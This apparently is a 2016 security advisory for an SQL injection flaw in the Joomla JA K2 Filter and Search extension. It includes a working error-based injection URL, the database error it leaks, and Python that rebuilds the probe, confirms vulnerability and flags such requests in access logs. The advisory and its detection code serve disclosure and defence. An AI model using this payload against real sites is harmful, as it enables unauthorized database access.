
Joomla Ja-K2-Filter-And-Search SQL Injection Vulnerability

October 20, 2016 • Security

POC

/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27

If the response contains the following text (in particular "You have an error in your SQL syntax;"), the vulnerability is present. In the echoed query the single quote from xf_2=5' lands inside the string literal of the i.extra_fields REGEXP clause and breaks it, and the category_id payload is reflected verbatim inside i.catid IN (...): both parameters are concatenated into the query without escaping.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"') AND (i.fulltext LIKE '%the%') ORDER BY i.id DESC LIMIT 0, 9' at line 1 SQL=SELECT DISTINCT i.*, CASE WHEN i.modified = 0 THEN i.created ELSE i.modified END as lastChanged, c.name as categoryname,c.id as categoryid, c.alias as categoryalias, c.params as categoryparams FROM #__k2_items as i RIGHT JOIN #__k2_categories AS c ON c.id = i.catid WHERE i.published = 1 AND i.access IN(1,1,5) AND i.trash = 0 AND c.published = 1 AND c.access IN(1,1,5) AND c.trash = 0 AND ( i.publish_up = '0000-00-00 00:00:00' OR i.publish_up <= '2016-10-20 03:44:31' ) AND ( i.publish_down = '0000-00-00 00:00:00' OR i.publish_down >= '2016-10-20 03:44:31' ) AND i.catid IN ((select 1 and row(1, 1)>(select count(*), concat(concat(CHAR(52), CHAR(67), CHAR(117), CHAR(117), CHAR(82), CHAR(57), CHAR(71), CHAR(65), CHAR(77), CHAR(98), CHAR(77)), floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))) AND (i.extra_fields REGEXP '{"id":"2","value":[^{]*"5'"') AND (i.fulltext LIKE '%the%') ORDER BY i.id DESC LIMIT 0, 9
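As an added illustration (this is not code from the original post, nor from the extension), the following Python rebuilds the probe request from its parameters, decodes the CHAR() marker the category_id payload carries, classifies a response the way the check above describes (MySQL syntax error plus the raw xf_2 value echoed inside the REGEXP literal for id 2), and flags the same two payload shapes in web-server access logs. The base URL, the log lines and the abridged copy of the error text are constructed for the example; the function names are this example's own.

```python
import re
from urllib.parse import urlencode, urlparse, parse_qs

# Parameters of the PoC request above; urlencode() rebuilds the probe URL from them.
POC_PARAMS = {
    "option": "com_jak2filter",
    "view": "itemlist",
    "Itemid": "135",
    "searchword": "the",
    # Error-based payload: a floor(rand()*2) ... GROUP BY duplicate-key probe that
    # carries a marker string assembled from CHAR() codes (decoded below).
    "category_id": (
        "(select 1 and row(1,1)>(select count(*),concat(concat("
        "CHAR(52),CHAR(67),CHAR(117),CHAR(117),CHAR(82),CHAR(57),"
        "CHAR(71),CHAR(65),CHAR(77),CHAR(98),CHAR(77)),floor(rand()*2))x "
        "from (select 1 union select 2)a group by x limit 1))"
    ),
    # One stray quote: enough to break the REGEXP '...' literal the value is pasted into.
    "xf_2": "5'",
}

MYSQL_SYNTAX_ERROR = "You have an error in your SQL syntax"

# Constructed sample response: an abridged copy of the error output shown on the page.
SAMPLE_ERROR_BODY = (
    "You have an error in your SQL syntax; check the manual that corresponds to your "
    "MySQL server version for the right syntax to use near '\"') AND (i.fulltext LIKE "
    "'%the%') ORDER BY i.id DESC LIMIT 0, 9' at line 1 SQL=SELECT DISTINCT i.* ... "
    "AND (i.extra_fields REGEXP '{\"id\":\"2\",\"value\":[^{]*\"5'\"') "
    "AND (i.fulltext LIKE '%the%') ORDER BY i.id DESC LIMIT 0, 9"
)

# Constructed access-log lines (combined format): one benign search, one probe with xf_2=5%27.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Oct/2016:03:40:02 +0000] "GET /index.php?option=com_jak2filter'
    '&view=itemlist&Itemid=135&searchword=the&xf_2=5 HTTP/1.1" 200 8812',
    '203.0.113.5 - - [20/Oct/2016:03:44:31 +0000] "GET /index.php?option=com_jak2filter'
    '&view=itemlist&Itemid=135&searchword=the&xf_2=5%27 HTTP/1.1" 500 1432',
]


def build_probe_url(base, params=POC_PARAMS):
    """Rebuild the PoC URL against an assumed (hypothetical) base URL."""
    return base.rstrip("/") + "/index.php?" + urlencode(params)


def decode_char_concat(expr):
    """Return the string that a chain of MySQL CHAR(n) calls concatenates to."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


RAND_GROUPBY = re.compile(r"floor\s*\(\s*rand\s*\(\s*\)\s*\*\s*2\s*\)", re.I)
GROUP_BY = re.compile(r"group\s+by", re.I)


def injected_params(url):
    """Map parameter name -> payload shapes seen in its value ('quote', 'rand-groupby')."""
    found = {}
    for name, values in parse_qs(urlparse(url).query, keep_blank_values=True).items():
        for v in values:
            if "'" in v or '"' in v:
                found.setdefault(name, []).append("quote")
            if RAND_GROUPBY.search(v) and GROUP_BY.search(v):
                found.setdefault(name, []).append("rand-groupby")
    return found


# Where the echoed query shows the xf_2 value: inside the extra_fields REGEXP literal for id 2.
XF2_LITERAL = re.compile(r'REGEXP \'\{"id":"2","value":\[\^\{\]\*"(.*?)"\'\)')


def classify_response(body, sent_value):
    """'vulnerable' only if the MySQL error appears AND our raw value is echoed in the query."""
    if MYSQL_SYNTAX_ERROR not in body:
        return "no-error"
    m = XF2_LITERAL.search(body)
    if m and m.group(1) == sent_value:
        return "vulnerable"
    return "error-unconfirmed"  # an SQL error, but not demonstrably caused by our input


LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def flag_access_log(lines):
    """Return entries of a combined-format access log whose request carries the payload shapes."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, ts, path, status = m.groups()
        params = injected_params(path)
        if params:
            hits.append({"ip": ip, "time": ts, "status": int(status), "params": params})
    return hits


if __name__ == "__main__":
    print(build_probe_url("http://example.test"))
    print("marker:", decode_char_concat(POC_PARAMS["category_id"]))
    print(classify_response(SAMPLE_ERROR_BODY, POC_PARAMS["xf_2"]))
    for hit in flag_access_log(SAMPLE_LOG):
        print(hit)
```

The classifier deliberately demands more than the error string: the same MySQL message can come from an unrelated server-side bug, so it also requires the raw xf_2 value to be visible inside the echoed REGEXP literal, which is exactly what the output above shows. The log function reuses the same parameter check, so a SOC can run it over historical access logs to find earlier probes of the same shape.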

[Screenshot: ja-k2-filter-and-search-Joomla-flaw.png]
